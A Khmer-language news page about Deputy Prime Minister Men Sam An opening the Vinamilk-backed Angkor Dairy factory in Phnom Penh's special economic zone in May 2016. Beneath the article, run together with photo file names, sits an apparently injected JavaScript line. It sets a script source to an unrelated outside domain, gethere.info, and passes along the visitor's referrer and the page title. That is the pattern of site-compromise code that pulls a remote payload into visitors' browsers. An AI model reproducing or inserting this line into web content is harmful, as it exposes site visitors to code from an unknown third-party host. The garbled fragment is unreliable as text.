ព្រឹតិ្តការណ៍ថ្មីៗ

លោកជំទាវឧបនាយករដ្ឋមន្ត្រី ម៉ែន សំអន ជាអធិបតីក្នុងពិធីសម្ពោធរោងចក្រទឹកដោះគោអង្គរ

2 ឆ្នាំ មុន 1 តូ សុផល

ព្រឹកថ្ងៃទី២៥ ខែឧសភា ឆ្នាំ២០១៦ លោកជំទាវឧបនាយករដ្ឋមន្ត្រី ម៉ែន សំអន រដ្ឋមន្ត្រីក្រសួងទំនាក់ទំនងជាមួយរដ្ឋសភា-ព្រឹទ្ធសភា និងអធិការកិច្ចបានអញ្ជើញជាអធិបតិក្នុងពិធីសម្ពោធរោងចក្រទឹកដោះ គោអង្គរ ដែលមានទីតាំងនៅក្នុងតំបន់សេដ្ឋកិច្ចពិសេសភ្នំពេញ រាជធានីភ្នំពេញ។ លោកជំទាវក៏បានមានប្រសាសន៍ថា រាជរដ្ឋាភិបាលកម្ពុជាបានចាត់ទុកវិស័យឯកជនជាក្បាលម៉ាសុីនដ៏សំខាន់ដើម្បីរួមចំណែកដល់កិច្ចអភិវឌ្ឍសេដ្ឋកិច្ច-សង្គមនិងបានបង្កលក្ខណៈងាយស្រួលដោយជម្រុញវិស័យឯកជនឲ្យរីកលូតលាស់តាមរយៈការអនុវត្តយុទ្ធសាស្រ្ដចតុកោណដំណាក់កាលទី៣ ដើម្បីកំណើនការងារសមធម៌និងប្រសិទ្ធភាព។ លោកជំទាវក៏បាន កោតសសើរដល់ក្រុមហ៊ុនទឹកដោះគោ វៀតណាម (VINAMILK) ដែលបានសហការជាមួយក្រុមហ៊ុន BPC Trading ដែលបានផ្តល់ទំនុកចិត្តនិង សម្រេចចិត្តវិនិយោគដោយបង្កើតរោងចក្រទឹកដោះគោអង្គរ ដែលមានទីតាំងស្តិតនៅក្នុងតំបន់សេដ្ឋកិច្ចពិសេសនេះ។

ការបង្កើតរោងចក្រនេះគឺពិតជាអាចរួមចំណែករក្សាស្ថិរភាព និងកំណើនសេដ្ឋកិច្ចនៅកម្ពុជា តាមរយៈការផ្ដល់ចំណូលនិងឱកាសការងារដល់ប្រជាពលរដ្ឋដែលជាកត្ដាចាំបាច់ក្នុងការជួយកាត់បន្ថយភាពក្រីក្រ លើសពីនេះទៅទៀត វាក៏ជាការរួមចំណែកក្នុងការងារនគរូបនីយកម្មនិងការអភិវឌ្ឍន៍រាជធានីភ្នំពេញនិងដោយបានកាត់បន្ថយការធ្វើចំណាកស្រុកទៅធ្វើការនៅប្រទេសជិតខាងផងដែរ។ សុវណ្ណ

13166045_608087936016830_8738152882604070741_n13237654_608087896016834_1594069779798970348_n13239319_608087929350164_7009934606156661791_n

11872305_10153513108267508_7760316066293043812_ophoto_2016-04-19_05-24-36s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ